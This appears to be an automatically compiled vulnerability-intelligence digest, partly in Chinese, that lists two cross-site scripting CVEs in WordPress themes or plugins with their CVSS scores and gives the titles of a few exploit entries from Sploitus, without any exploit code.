CVE-2025-15654 CVSS:7.1 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fox-themes Prague allows… - CVE-2026-42685 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripti
CVE-2026-42685High 7.1
CVE-2026-42685 CVSS:7.1 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ahmad WP Job Portal allows…
⚔️ Sploitus(60 条)
Unknown (60 条)
- Poc-PoisonJar exploit
Poc-PoisonJar exploit - simplectf exploit
simplectf exploit
…另有 58 条 Unknown 级漏洞(已省略)
🤖 漏洞情报自动汇总 · 2026-06-05 · 数据来源: NVD / GitHub Advisory / Sploitus / CISA-KEV